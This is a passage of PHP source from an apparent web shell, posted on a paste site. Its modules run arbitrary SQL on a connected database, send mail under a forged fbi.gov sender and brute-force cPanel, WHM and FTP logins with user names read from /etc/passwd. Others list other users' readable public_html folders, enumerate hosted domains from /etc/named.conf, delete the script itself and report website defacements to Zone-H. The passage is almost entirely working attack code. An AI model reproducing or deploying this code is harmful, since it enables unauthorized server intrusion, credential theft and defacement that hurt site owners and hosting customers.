  703. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  704. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  705. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  706. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  707. Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  708. for($i = 1;$i <= $totpage;$i++)
  709. {
  710. $head .= "<option value=\"".$i."\">".$i."</option>";
  711. if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  712. }
  713. $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  714. $msg = $msgq.$head.$msg;
  715. }
  716. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  717. {
  718. $db = $_GET['db'];
  719. $query = magicboom($_GET['sqlquery']);
  720. $msg = "<div style=\"width:99%;padding:0 10px;\">
  721. <form action=\"?\" method=\"get\">
  722. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  723. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  724. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  725. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  726. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  727. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  728. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  729. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  730. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  731. </form>
  732. </div> ";
  733. @mysql_select_db($db);
  734. $querys = explode(";",$query);
  735. foreach($querys as $query)
  736. {
  737. if(trim($query) != "")
  738. {
  739. $hasil = mysql_query($query);
  740. if($hasil)
  741. {
  742. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  743. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  744. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  745. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  746. $msg .= "</tr>";
  747. for($i=0;$i<@mysql_num_rows($hasil);$i++)
  748. {
  749. $rows=@mysql_fetch_array($hasil);
  750. $msg .= "<tr>";
  751. for($j=0;$j<@mysql_num_fields($hasil);$j++)
  752. {
  753. if($rows[$j] == "") $dataz = "&nbsp;";
  754. else $dataz = $rows[$j];
  755. $msg .= "<td>".$dataz."</td>";
  756. }
  757. $msg .= "</tr>";
  758. }
  759. $msg .= "</table>";
  760. }
  761. else
  762. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  763. }
  764. }
  765. }
  766. else
  767. {
  768. $query = "SHOW PROCESSLIST;\n
  769. SHOW VARIABLES;\n
  770. SHOW STATUS;";
  771. $msg = "<div style=\"width:99%;padding:0 10px;\">
  772. <form action=\"?\" method=\"get\">
  773. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  774. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  775. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  776. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  777. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  778. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  779. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  780. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  781. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  782. </form>
  783. </div> ";
  784. $dbs = array();
  785. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  786. $hasil = @mysql_list_dbs($con);
  787. while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  788. @sort($dbs);
  789. foreach($dbs as $db)
  790. {
  791. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  792. }
  793. $msg .= "</table>";
  794. }
  795. @mysql_close($con);
  796. }
  797. else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  798. echo $msg;
  799. }
  800. else
  801. {
  802. ?>
  803. <form action="?" method="get">
  804. <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  805. <input type="hidden" name="x" value="mysql" />
  806. <table class="tabnet" style="width:300px;">
  807. <tr>
  808. <th colspan="2">Connect to mySQL server</th>
  809. </tr>
  810. <tr>
  811. <td>&nbsp;&nbsp;Host</td>
  812. <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  813. </tr>
  814. <tr>
  815. <td>&nbsp;&nbsp;Username</td>
  816. <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  817. </tr>
  818. <tr>
  819. <td>&nbsp;&nbsp;Password</td>
  820. <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  821. </tr>
  822. <tr>
  823. <td>&nbsp;&nbsp;Port</td>
  824. <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  825. </tr>
  826. </table>
  827. </form>
  828. <?php
  829. }
  830. }
  831. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  832. {
  833. if(isset($_POST['mail_send']))
  834. {
  835. $mail_to = $_POST['mail_to'];
  836. $mail_from = $_POST['mail_from'];
  837. $mail_subject = $_POST['mail_subject'];
  838. $mail_content = magicboom($_POST['mail_content']);
  839. if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  840. { $msg = "email sent to $mail_to"; }
  841. else $msg = "send email failed";
  842. }
  843. ?>
  844. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  845. <table class="cmdbox">
  846. <tr>
  847. <td>
  848. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  849. </td>
  850. </tr>
  851. <tr>
  852. <td>
  853. &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to
  854. </td>
  855. </tr>
  856. <tr>
  857. <td>
  858. &nbsp;<input class="inputz" style="width:20%;" type="text" value="Newbie3viLc063s0@fbi.gov" name="mail_from" />
  859. &nbsp; from
  860. </td>
  861. </tr>
  862. <tr>
  863. <td>
  864. &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  865. </td>
  866. </tr>
  867. <tr>
  868. <td>
  869. &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  870. </td>
  871. </tr>
  872. <tr>
  873. <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  874. </td>
  875. </tr>
  876. </table>
  877. </form>
  878. <?php
  879. }
  880. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  881. {
  882. ?>
  883. <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  884. <?php
  885. //bruteforce
  886. @ini_set('memory_limit', 999999999999);
  887. $connect_timeout=5;
  888. @set_time_limit(0);
  889. $pokeng = $_REQUEST['submit'];
  890. $hn = $_REQUEST['users'];
  891. $crew = $_REQUEST['passwords'];
  892. $pasti = $_REQUEST['sasaran'];
  893. $manualtarget = $_REQUEST['target'];
  894. $bisa = $_REQUEST['option'];
  895. if($pasti == ''){
  896. $pasti = 'localhost';
  897. }
  898. if($manualtarget == ''){
  899. $manualtarget = 'http://localhost:2082';
  900. }
  901.  
  902. function get_users()
  903. {
  904. $users = array();
  905. $rows=file('/etc/passwd');
  906. if(!$rows) return 0;
  907. foreach ($rows as $string)
  908. {
  909. $user = @explode(":",$string);
  910. if(substr($string,0,1)!='#') array_push($users,$user[0]);
  911. }
  912. return $users;
  913. }
  914.  
  915. if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  916. else
  917. {
  918. print " <div align='center'>
  919. <form method='post' style='border: 1px solid #000000'><br><br>
  920. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  921. <tr>
  922. <td>
  923. <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  924. <div align='center'><br>
  925. <TABLE style='BORDER-COLLAPSE: collapse'
  926. cellSpacing=0
  927. borderColorDark=#666666
  928. cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  929. <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  930. </tr>
  931. </table>
  932. <p align='center'>
  933. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  934. foreach($users as $user) { echo $user."\n"; }
  935. print"</textarea>
  936. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  937. <br>
  938. <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  939. <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  940. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  941. <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  942. </td></tr></table></td></tr></form><p align= 'left'>";
  943. }
  944. ?>
  945. <?php
  946.  
  947. function manual_check($anjink,$asu,$babi,$lonte){
  948. $ch = curl_init();
  949. curl_setopt($ch, CURLOPT_URL, "$anjink");
  950. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  951. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  952. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  953. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  954. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  955. $data = curl_exec($ch);
  956. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  957. elseif ( curl_errno($ch) == 0 ){
  958. print "<b>[ Newbie3viLc063s0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  959. }
  960. curl_close($ch);
  961. }
  962.  
  963.  
  964. function ftp_check($link,$user,$pswd,$timeout){
  965. $ch = curl_init();
  966. curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  967. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  968. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  969. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  970. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  971. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  972. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  973. $data = curl_exec($ch);
  974. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  975. elseif ( curl_errno($ch) == 0 ){
  976. print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  977. }
  978. curl_close($ch);
  979. }
  980.  
  981. function cpanel_check($anjink,$asu,$babi,$lonte){
  982. $ch = curl_init();
  983. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  984. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  985. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  986. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  987. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  988. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  989. $data = curl_exec($ch);
  990. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  991. elseif ( curl_errno($ch) == 0 ){
  992. print "<b>[ Newbie3viLc063s@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  993. }
  994. curl_close($ch);
  995. }
  996.  
  997. function whm_check($anjink,$asu,$babi,$lonte){
  998. $ch = curl_init();
  999. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1000. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1001. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1002. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1003. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1004. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1005. $data = curl_exec($ch);
  1006. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1007. elseif ( curl_errno($ch) == 0 )
  1008. {
  1009. print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1010. }
  1011. curl_close($ch);
  1012. }
  1013.  
  1014. if(isset($pokeng) && !empty($pokeng))
  1015. {
  1016. $userlist = explode ("\n" , $hn );
  1017. $passlist = explode ("\n" , $crew );
  1018. print "<b>[ " . TITLE . " ]# </b> ATTACK...!!! </font></b><br>";
  1019. foreach ($userlist as $asu)
  1020. {
  1021. $_user = trim($asu);
  1022. foreach ($passlist as $babi )
  1023. {
  1024. $_pass = trim($babi);
  1025. if ($bisa == "manual")
  1026. { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1027. if($bisa == "ftp")
  1028. { ftp_check($pasti,$_user,$_pass,$lonte); }
  1029. if ($bisa == "cpanel")
  1030. { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1031. if ($bisa == "whm")
  1032. { whm_check($pasti,$_user,$_pass,$lonte); }
  1033. }
  1034. }
  1035. }
  1036. }
  1037.  
  1038. //bruteforce
  1039.  
  1040. elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1041. {
  1042. ?>
  1043. <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1044. <?php
  1045.  
  1046. //radable public_html
  1047. echo '<html><head><title>Newbie3viLc063s Cpanel Finder</title></head><body>';
  1048. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1049. set_time_limit(0);
  1050. ###################
  1051. @$passwd = fopen('/etc/passwd','r');
  1052. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1053. $pub = array();
  1054. $users = array();
  1055. $conf = array();
  1056. $i = 0;
  1057. while(!feof($passwd))
  1058. {
  1059. $str = fgets($passwd);
  1060. if ($i > 35)
  1061. {
  1062. $pos = strpos($str,':');
  1063. $username = substr($str,0,$pos);
  1064. $dirz = '/home/'.$username.'/public_html/';
  1065. if (($username != ''))
  1066. {
  1067. if (is_readable($dirz))
  1068. {
  1069. array_push($users,$username);
  1070. array_push($pub,$dirz);
  1071. }
  1072. }
  1073. }
  1074. $i++;
  1075. }
  1076. ###################
  1077. echo '<br><br><textarea class="output" >';
  1078. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  1079. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  1080. echo "[~] Searching for passwords in config files...\n\n";
  1081. foreach ($users as $user)
  1082. {
  1083. $path = "/home/$user/public_html/";
  1084. echo "$path \n";
  1085. }
  1086. echo "\n";
  1087. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n";
  1088. echo "[+] Complete...\n";
  1089. echo '</textarea><br><br></b>
  1090. </body>
  1091. </html>';
  1092.  
  1093. //radable public_html
  1094.  
  1095. }
  1096.  
  1097. elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1098. {
  1099. ?>
  1100. <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1101. <?php
  1102.  
  1103. //radable public_html
  1104.  
  1105. echo "<br><br>";
  1106. $file = @implode(@file("/etc/named.conf"));
  1107. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1108. preg_match_all("#named/(.*?).db#",$file ,$r);
  1109. $domains = array_unique($r[1]);
  1110.  
  1111. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1112.  
  1113. check();
  1114.  
  1115. echo "<table align=center border=1 width=59% cellpadding=5>
  1116. <tr><td colspan=2>[+] Here We Have : [<b>".count($domains)."</b>] Listed Domains In localhost.</td></tr>
  1117. <tr><td><b>List Of Users</b></td><td><b>List Of Domains</b></td></tr>";
  1118.  
  1119. foreach($domains as $domain)
  1120. {
  1121. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1122. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  1123. }
  1124.  
  1125. echo "</table>";
  1126. //radable public_html
  1127. }
  1128.  
  1129. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){ ?>
  1130. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  1131. <br><br><? echo '<p style="text-align: center;"> <img alt="" src="http://www.zone-h.org/images/logo.gif" style="width: 261px; height: 67px;" /></p>
  1132. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Newbie3viLc063s" /><br> <select class="inputz" name="hackmode">
  1133. <option>------------------------------------SELECT-------------------------------------</option>
  1134. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  1135. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  1136. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  1137. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  1138. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  1139. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  1140. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  1141. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  1142. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  1143. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  1144. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  1145. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  1146. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  1147. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  1148. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  1149. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  1150. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  1151. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  1152. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  1153. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  1154. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  1155. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  1156. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  1157. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  1158. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  1159. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  1160. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  1161. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  1162. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  1163. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  1164. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1165. </select> <br>
  1166.  
  1167. <select class="inputz" name="reason">
  1168. <option >------------------------------------SELECT-------------------------------------</option>
  1169. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  1170. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  1171. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  1172. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  1173. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  1174. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  1175. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  1176. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1177. </select> <br>
  1178. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  1179. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  1180. </form>'; ?>
  1181. <?
  1182. echo "</form></center>";?>
  1183. <?
  1184. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  1185. {
  1186. $k = curl_init();
  1187. curl_setopt($k, CURLOPT_URL, $url);
  1188. curl_setopt($k,CURLOPT_POST,true);
  1189. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&do
Add Comment
Please, Sign In to add comment